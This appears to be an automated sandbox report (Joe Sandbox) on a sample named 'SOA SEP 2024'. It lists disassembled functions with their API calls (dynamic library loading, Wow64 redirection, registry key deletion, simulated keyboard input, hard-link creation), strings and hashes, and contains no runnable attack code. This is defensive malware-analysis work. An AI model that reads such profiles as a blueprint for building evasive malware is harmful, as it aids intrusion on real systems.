API String ID: 3850602802-1010561917
Opcode ID: 79285cd8e177995b9ccd0f4a6876ec1542fdcdd541b72b689ef4a5d84043b77e
Instruction ID: a0b6625cd6f4f2b477573d571dbced90e37cc087654e321b89fab7c2564fde8a
Opcode Fuzzy Hash: 79285cd8e177995b9ccd0f4a6876ec1542fdcdd541b72b689ef4a5d84043b77e
Instruction Fuzzy Hash: 9811E771200248BEEF245F64CC49FAB376DFF88768F11411CFA4596091D2B9E811C724

Function 00782287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00782350,?), ref: 007822A1
GetProcAddress.KERNEL32(00000000), ref: 007822A8

Strings

combase.dll, xrefs: 0078229C
RoInitialize, xrefs: 00782290

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: 22abff263b3c4f6b7dfbca7c12392a032cf348603e9819138e5a1298093b75ab
Instruction ID: c0726d2be993366c155d0f94aa45d9bdd94baba431939d0d22f76d29c7ef6b2e
Opcode Fuzzy Hash: 22abff263b3c4f6b7dfbca7c12392a032cf348603e9819138e5a1298093b75ab
Instruction Fuzzy Hash: 48E01A70A91340EBDB306F71ED89B543669BB08712F00C024B102D50A1CBB888A2CF08

Function 0078235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00782276), ref: 00782376
GetProcAddress.KERNEL32(00000000), ref: 0078237D

Strings

combase.dll, xrefs: 00782371
RoUninitialize, xrefs: 00782365

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: ade9d5a28cb6b8c5e138358a60fb2a4fba309b3edee7faa504ca5049048b1909
Instruction ID: 57ee8dfa35b5984d59e22a2dc354c5983918cea9ba2427279158479b51547c99
Opcode Fuzzy Hash: ade9d5a28cb6b8c5e138358a60fb2a4fba309b3edee7faa504ca5049048b1909
Instruction Fuzzy Hash: D5E0ECB0586340EFDB306F61ED4EB443A69BB08702F11C424F109DA0B2CBBC5822CF14

Function 007DAC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 007DAC60
__swprintf.LIBCMT ref: 007DAC94

Strings

%.3d, xrefs: 007DAC6E
WIN_XPe, xrefs: 007DACD3

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 01618b57dc69b424e8b8984bec9572f5be04ddc02d94e9417433a9168d6d79f5
Instruction ID: 78821af2aa226f9a1f26ddf224bae26efda0a65834b8cbe621add5a42f11df88
Opcode Fuzzy Hash: 01618b57dc69b424e8b8984bec9572f5be04ddc02d94e9417433a9168d6d79f5
Instruction Fuzzy Hash: 71E0EC71814618EBCA1097508D499FA737CFB08751F544093BA0AA2200E63D9BC4AA22

Function 007C2205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,007C21FB,?,007C23EF), ref: 007C2213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 007C2225

Strings

GetProcessId, xrefs: 007C221F
kernel32.dll, xrefs: 007C220E

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: 925c991fa41e5ec8d916b2d452c1ef777dba7afe8ba4c6d6d74c9e069465515e
Instruction ID: d59273e9375a807f32de8d9374bda3e24973b8945ba743e45bd0eae38d1765d4
Opcode Fuzzy Hash: 925c991fa41e5ec8d916b2d452c1ef777dba7afe8ba4c6d6d74c9e069465515e
Instruction Fuzzy Hash: 8DD05E344007169FC7214B24A848A8177EAFF08710B02842DA856E2251D678D8808650

Function 007642F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,007642EC,?,007642AA,?), ref: 00764304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00764316

Strings

kernel32.dll, xrefs: 007642FF
Wow64RevertWow64FsRedirection, xrefs: 00764310

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 121a32130f56eeba88f210b7e476ca654f87741e755ce1bac191d84b1a03f8ea
Instruction ID: 826f73acac08120d5080eab10736ba2c2dcc7b36bbb57d1ac6e15e20f31f90d3
Opcode Fuzzy Hash: 121a32130f56eeba88f210b7e476ca654f87741e755ce1bac191d84b1a03f8ea
Instruction Fuzzy Hash: 1CD05E304007129EC7214B25A8486417AE9EF08301B018419A856E6360D6B8C8808610

Function 0076434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,007641BB,00764341,?,0076422F,?,007641BB,?,?,?,?,007639FE,?,00000001), ref: 00764359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0076436B

Strings

Wow64DisableWow64FsRedirection, xrefs: 00764365
kernel32.dll, xrefs: 00764354

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: c56ed9e8b0e1761bc0ad09ae5bf9aff481e3fd5978efc6359091bf6b39ab7595
Instruction ID: 6c4d3c689031f5eeeaa043abd0631c5507d48ec68acc39f00533decdece8ea20
Opcode Fuzzy Hash: c56ed9e8b0e1761bc0ad09ae5bf9aff481e3fd5978efc6359091bf6b39ab7595
Instruction Fuzzy Hash: 07D0A7304007129FC7304F35E8486417AE8FF15715B01841DE896E6350D7BCDCC0C714

Function 007A0564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,007A052F,?,007A06D7), ref: 007A0572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 007A0584

Strings

UnRegisterTypeLibForUser, xrefs: 007A057E
oleaut32.dll, xrefs: 007A056D

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: 3bfbf528a598370255d2801e614016041e819f83a4dd35328810a0c9bfe0e469
Instruction ID: 21c74de3adf0eff6f3e9cf7b09a4a2cc9fe45c675c1f4d194d7f77dfd8e3dfc1
Opcode Fuzzy Hash: 3bfbf528a598370255d2801e614016041e819f83a4dd35328810a0c9bfe0e469
Instruction Fuzzy Hash: E2D05E308007129AC7305F24A848B4277E8AF09301F11891DE851D2250DA78C8D48F60

Function 007A0539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,007A051D,?,007A05FE), ref: 007A0547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 007A0559

Strings

RegisterTypeLibForUser, xrefs: 007A0553
oleaut32.dll, xrefs: 007A0542

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: bc9a03e003f0f12737d00378d6598968a26cf952924bd3634bd7a156f08a9c2c
Instruction ID: cfe2f6d3518332ba7a8b7ae878f9c50de459c69f121fe6fed61ba69eb4838a31
Opcode Fuzzy Hash: bc9a03e003f0f12737d00378d6598968a26cf952924bd3634bd7a156f08a9c2c
Instruction Fuzzy Hash: 84D0A7748007129FCB309F24E848A41B6E8FF05301F15C81DE456D2250DA7CCCD08B51

Function 007BECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,007BECBE,?,007BEBBB), ref: 007BECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007BECE8

Strings

GetSystemWow64DirectoryW, xrefs: 007BECE2
kernel32.dll, xrefs: 007BECD1

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 396231c4ea0e88b7c6614da33229f8cb403a64d958b6bf74951da7e1383a14ca
Instruction ID: f91f5b8c7646ac89ca14144edc90bda78659b9a90fa7c68cafbe1463bf7bb7a9
Opcode Fuzzy Hash: 396231c4ea0e88b7c6614da33229f8cb403a64d958b6bf74951da7e1383a14ca
Instruction Fuzzy Hash: 99D05E704017239ECB205B64E8887C27AE8EF08300B019419A855D2351DA78C8848664

Function 007BBADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,007BBAD3,00000001,007BB6EE,?,007FDC00), ref: 007BBAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007BBAFD

Strings

GetModuleHandleExW, xrefs: 007BBAF7
kernel32.dll, xrefs: 007BBAE6

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 96cac1b41671e95dfd088ea69e9bf3d4236ed3d6e2d469370ddef687e11aca8d
Instruction ID: 57eedb5a5f313cff534f0046832493fbeb0d7700cfe0b0b9bbe081f3a9d6e81a
Opcode Fuzzy Hash: 96cac1b41671e95dfd088ea69e9bf3d4236ed3d6e2d469370ddef687e11aca8d
Instruction Fuzzy Hash: EAD052B4800B129EC7309F25A888B9276E8EF08300B01842EA8A7D2250EBB8C880CA14

Function 007C3BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,007C3BD1,?,007C3E06), ref: 007C3BE9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007C3BFB

Strings

RegDeleteKeyExW, xrefs: 007C3BF5
advapi32.dll, xrefs: 007C3BE4

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 4b158efccb35b57186e0259e6ae0f86094db31ab8eae4ed7a9218c9678d2eab8
Instruction ID: 31a23bc8f0652160fe4c5ad30752c8d142f39b461fc47bb05a86c5df8b73e003
Opcode Fuzzy Hash: 4b158efccb35b57186e0259e6ae0f86094db31ab8eae4ed7a9218c9678d2eab8
Instruction Fuzzy Hash: 98D05EB04007569ED7305B64E848A47BBA8AF15318F11C41DE455E6290D6BCC8808A20

Function 00799B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a911f0e3f2fae86d042b969d174c9e5d81d474346a745ec367660cad7ca3ef23
Instruction ID: 0062dc178f5ca149f66466c439fd0e29eadb780d1d6eee2702dda2307311b2c6
Opcode Fuzzy Hash: a911f0e3f2fae86d042b969d174c9e5d81d474346a745ec367660cad7ca3ef23
Instruction Fuzzy Hash: FCC15F75A0021AEFEF14CFA8D884AAEB7B5FF48710F10459CEA059B251D734EE41DBA0

Function 007BAA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 007BAAB4
CoUninitialize.OLE32 ref: 007BAABF

Part of subcall function 007A0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007A027B

VariantInit.OLEAUT32(?), ref: 007BAACA
VariantClear.OLEAUT32(?), ref: 007BAD9D

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 1bb12af92619106331c04acb0013bc8bea7e240b12566da0d433ec03265df855
Instruction ID: 3c565ecd409811631c8946e856da9788be201f42af5fdff3c256a0c5e855b6db
Opcode Fuzzy Hash: 1bb12af92619106331c04acb0013bc8bea7e240b12566da0d433ec03265df855
Instruction Fuzzy Hash: F2A14875204701EFCB10EF15C485B5AB7E4BF88710F148449FA9AAB3A2CB38ED44CB96

Function 007991CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007991DD
SysAllocString.OLEAUT32(?), ref: 00799286
VariantCopy.OLEAUT32 ref: 007992B5
VariantClear.OLEAUT32(?), ref: 007992DC

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 8323afe2e53f55836872dd863df5a48f0cdc1c15d2766e374301582d7e6c3162
Instruction ID: 66919de49241447ee7e3be43ae328661dda5f4d1f6757cd8645631af43127258
Opcode Fuzzy Hash: 8323afe2e53f55836872dd863df5a48f0cdc1c15d2766e374301582d7e6c3162
Instruction Fuzzy Hash: EC518430600306EBFF249F6DE495A2EB3A5AF55350F20C81FE64ACB2D1EB7898408705

Function 007CC4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00D46C40,?), ref: 007CC544
ScreenToClient.USER32(?,00000002), ref: 007CC574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 007CC5DA

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: ec1bf1daa5f522391311e2cb0c34b1ad77990b005adf5e419c0b18e3657d9256
Instruction ID: 11c2244f9e98e848db50b5ad1e2eb4361791e6f5f13c576c868839417346c926
Opcode Fuzzy Hash: ec1bf1daa5f522391311e2cb0c34b1ad77990b005adf5e419c0b18e3657d9256
Instruction Fuzzy Hash: 74514C75900208EFCF21DF68D884EAE7BB6BB59320F24825DF9199B290D734ED41CB90

Function 0079C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0079C462
__itow.LIBCMT ref: 0079C49C

Part of subcall function 0079C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0079C753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 0079C505
__itow.LIBCMT ref: 0079C55A

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 3d376d45865a8ebea96d0ca46efc0cdd6815b30b392cd66de3e9c3b39e907130
Instruction ID: 6c527f7515b08867bcc631e77406b0f13c579e33c03bbf66d1934eb0eaaaebdc
Opcode Fuzzy Hash: 3d376d45865a8ebea96d0ca46efc0cdd6815b30b392cd66de3e9c3b39e907130
Instruction Fuzzy Hash: CF41B871A00208EFDF26EF54D856FEE7BB9AF49700F000059F906A7291DB789E55CBA1

Function 007A390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007A3966
SetKeyboardState.USER32(00000080,?,00000001), ref: 007A3982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 007A39EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 007A3A4D

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 323170cd650129fb613c819fbb19f3f94c7843161702f6028d730accc32fafd8
Instruction ID: a0bfadc7f229350b7a958e810892610070878a27c544f2a64de98de10fba5357
Opcode Fuzzy Hash: 323170cd650129fb613c819fbb19f3f94c7843161702f6028d730accc32fafd8
Instruction Fuzzy Hash: 64411770A04258AAEF308F64880ABFEBBB59BCA314F04435AF4C1961C1C7BD9E85D765

Function 007AE698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007AE742
GetLastError.KERNEL32(?,00000000), ref: 007AE768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007AE78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007AE7B9

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
